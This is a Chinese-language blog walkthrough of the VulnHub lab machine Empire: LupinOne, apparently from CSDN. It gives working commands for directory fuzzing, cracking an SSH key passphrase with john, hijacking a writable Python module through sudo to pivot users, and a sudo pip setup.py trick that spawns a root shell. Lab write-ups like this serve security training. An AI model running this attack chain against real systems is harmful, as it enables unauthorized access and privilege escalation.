Vulnhub靶机——EMPIRE: LUPINONE(PiP命令提权)

已于 2024-04-09 08:42:25 修改
阅读量1k 收藏 8
点赞数 32
分类专栏: Vulnhub 文章标签: 网络安全 安全 系统安全 web安全 pip linux
于 2024-04-09 01:44:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/137530136
版权

靶机地址(中等)

Empire: LupinOne ~ VulnHub

渗透知识点

(1)目录扫描

(2)Fuzz爆破

(3)john工具转化ssh密钥

(4)水平越权

(5)sudo(pip提权)

思路总结

(1)尝试爆破和弱口令登录ssh未果

(2)敏感目录泄露,FUZZ爆破出密钥

(3)jhon转化密钥,破解密钥

(4)利用密钥进行ssh登录靶机

(5)查看用户可执行权限的文件

(6)水平越权

(7)pip命令提权

渗透流程

一、主机发现

        靶机IP(192.168.186.157)

        攻击机IP(192.168.186.135)

二、端口扫描

(1)扫描服务程序版本,操作系统

nmap -sV -p- -O 192.168.186.157

(2)强力扫描(能进行目录扫描)

nmap -A -sV -T4 -p- 192.168.186.157

三、实施攻击

1.SSH端口渗透

开放22端口,尝试爆破和未授权试探无果

2.HTTP端口渗透

(1)访问80端口

(2)查看源码(无信息泄露)

(3)目录扫描,dirsearch扫描(扫描有点慢)

dirsearch.py -u http://192.168.186.157/

(4)访问robots

(5)访问~myfiles目录

(6)源码查看(应该还有类似~myfiles的目录)

(7)使用ffuf进行模糊爆破(成功爆出~secret目录)

(-c 颜色输出,-w指定字典,-u指定暴力破解的目录,~FUZZ就是爆破类似~myfiles形式的目录)

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.186.157/~FUZZ'

(8)访问~secret目录(爆破的形式是~FUZZ)

(4个关键点,存在ssh私钥,私钥藏起来了,使用fasttrack字典破解,用户名icex64)

(下一步则需要寻找该私钥,并且用fasttrack字典来破解它)

(9)猜测ssh私钥以.xxx的形式存在(参数-e指定后缀名列表,-fc过滤指定403状态返回码)

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.186.157/~secret/.FUZZ' -e .txt,.html -fc 403

(10)扫描无果,更换字典

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.186.157/~secret/.FUZZ' -e .txt,.html -fc 403

(11)访问.mysecret.txt

(12)在线编码识别(base58编码)

Decrypt a Message - Cipher Identifier - Online Code Recognizer

(13)base58解码得到ssh私钥

四、获取shell

(1)将ssh密钥的内容保存为ssh.txt,利用ssh2john工具转化密钥

(ssh2john:转化ssh密钥为john能识别的hash格式,转化之后的密钥是可以被破解的)

  在kali中找到ssh2john的路径

locate ssh2john

(2)将ssh.txt转化为passwd.txt(john可识别的hash格式)

/usr/share/john/ssh2john.py ssh.txt > passwd.txt

(3)根据前面的提示,使用fasttrack字典解密ssh,得到ssh密码:P@55w0rd!

john --wordlist=/usr/share/wordlists/fasttrack.txt passwd.txt

John --show passwd.txt

(4)给密钥ssh.txt权限,并以此进行ssh远程登录,拿到用户icex64的shell

chmod 777 ssh.txt

ssh icex64@192.168.186.157 -i ssh.txt

(5)登录时候如果出现报错(error in libcrypto)

错误原因:base58解密过后的编码先复制到了windows笔记本粘贴后再复制文件到kali,导致报错

解决办法:将解码的密钥复制直接以vim的形式保存到kali中

五、权限提升

1.水平越权

(1)查看用户icex64可执行的文件

sudo -l

(2)去到该路径,查看文件(发现文件导入了webbrowser模块)

(3)查找webbrowser模块(python模块)

whereis webbrowser.py

locate webbrowser.py

(4)这里也可以用find命令查找

find /usr -name *webbrowser*

(5)查看该文件,发现导入了os模块

(如果该文件具有可写权,就可以利用os.system('/bin/bash')调用shell)

(6)查看文件的权限(当前用户具备可写权)

ls -l /usr/lib/python3.9/webbrowser.py

(7)改写文件(vim+文件路径,发现靶机没有vim命令)

vim /usr/lib/python3.9/webbrowser.py

(8)使用nano改写

nano /usr/lib/python3.9/webbrowser.py

(9)写入os.system("/bin/bash")

(10)sudo -u命令可以切换到指定用户下执行命令,成功越权至用户arsene

sudo -u arsene python3.9 /home/arsene/heist.py

2.垂直越权

(1)查看用户arsene的权限(发现arsene用户无需root密码就能执行pip命令)

sudo -l

(2)直接搜寻pip提权方法 https://gtfobins.github.io/gtfobins/pip/

(3)使用sudo提权,复制代码,在终端执行,提权成功

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Yeah_0day
关注
  • 32
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnhub——Empire:LupinOne
Re1_zf的博客
11-06 619
find命令找到webbrowser模块,其实不使用find也可以,因为是python模块,直接去python目录下找就可以了。先给私钥文件赋权,600,太高会无法登录,再使用爆破出来的密码登录。打开了22和80端口,有一个敏感文件暴露——robots.txt。base64解码一下,发现是乱码,尝试了一下其他的base解码。netdiscover进行一下主机发现,PCS的标识就是主机。可以对这个文件做一下修改,让他来反弹shell。查看一下当前用户能执行的命令和文件。查看一下当前用户有权执行的文件。
vulnhub-Empire: LupinOne
qq_43006864的博客
05-05 2175
Empire: LupinOne ~ VulnHub 靶机:EMPIRE: LUPINONE 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: 这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。 map -sS -sV -A -p- 192.168.1.109 目标网站: 22/80端口 r.
Vulnhub项目:EMPIRE: LUPINONE
Ays.Ie的博客
12-07 283
Vulnhub项目:EMPIRE: LUPINONE
Vulnhub靶场】EMPIRE: LUPINONE
DG_s1mple
02-13 3735
环境准备 下载镜像后导入到vmware,没啥好说的 发现题目已经给出了ip地址 攻击机IP地址:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用nmap扫描主机信息 发现靶机只开放了ssh跟http,我们先访问他的网站 只有一张图片,查看源代码也没有什么好的发现 开始渗透 我们扫描一下他的网站目录 发现有robots.txt,我们访问一下,发现有~myfiles文件夹 我们访问一下发现404,但是我们查看源代码发现 叫我们继续尝试,就是暗示我们还有别的文件夹,我
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8305
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
加密与安全_三种方式实现基于国密非对称加密算法的加解密和签名验签
最新发布
小工匠
06-30 1001
无需秘钥,“加密”后的数据不可逆。所以这也不算是“加密”,一般称为哈希(Hash)。任何长度的数据生成的哈希值长度都固定。相同数据每次生成的哈希值相同,不同的数据则不同。数据摘要/哈希,验证数据是否被篡改、或数据丢失,保障数据的完整性、不可篡改性。单向加密保存数据,如密码的保存,密码的存储普遍都是存的哈希值,登录时比较其hash值即可。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 353
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 347
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
韩国锂电池工厂火灾:行业安全警钟再次敲响
iotsensor的博客
06-27 343
这些传感器可以实时监测锂电池的温度、压力、气体浓度等参数,一旦发现异常情况,可以立即发出警报并采取相应措施,从而有效避免火灾事故的发生。同时,也需要加大研发力度,推动锂电池安全技术的不断进步和创新,以确保锂电池的安全可靠使用。等传感器监测防护区内CO气体浓度、氢气浓度、VOC浓度、可燃气体浓度和电池表面温度的变化,智能判断锂电池是否发生热失控,提前预警,有效避免火灾事故的发生。随着新能源汽车和储能领域的快速发展,锂电池的应用规模不断扩大,但与此同时,其潜在的安全风险也在不断提升。、氢气(H2)传感器。
VUE项目安全漏洞扫描和修复
qq_33225414的博客
06-27 227
它是通过分析 package-lock.json 文件,继而扫描我们的包分析是否包含漏洞的。3、npm audit命令将项目中配置的依赖项的描述提交到默认注册中心,并要求提供已知漏洞的报告。如果发现任何漏洞,则将计算影响和适当的补救措施。1、npm audit是npm 6 新增的一个命令,可以允许开发人员分析复杂的代码并查明特定的漏洞。4、启动服务,不出意外的话,vue.config.js 的配置会有报错。1.扫描你的项目的漏洞,只显示细节,不修复任何东西。如果没有发现漏洞,该命令将以0退出。
自主可控的芯片设计供应链软件:保障芯片产业安全的关键
YouyuanXway的博客
06-27 425
在当前的科技浪潮中,芯片作为信息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。
访问外网的安全保障——反向沙箱
Canon_YK的博客
06-21 506
目前许多安全厂家因为使用的需求,进而研制出反向沙盒,其中深信达SPN(Sandbox Proxy Network)安全上网解决方案,是直接把终端传统外网物理断开,然后在内网中部署一个沙盒安全上网网关主机,在需要访问外网的终端上安装一个沙盒,当需要访问互联网的时候,在这个隔离沙盒内访问互联网。然而,需要注意的是,虽然反向沙箱为我们提供了强大的网络安全防护能力,但它并非万能的解决方案。由此可见,反向沙箱的运行逻辑是和正常的沙箱是相反的,只能通过沙盒的安全空间以及网关上的设置使得上外网只能通过改途径。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值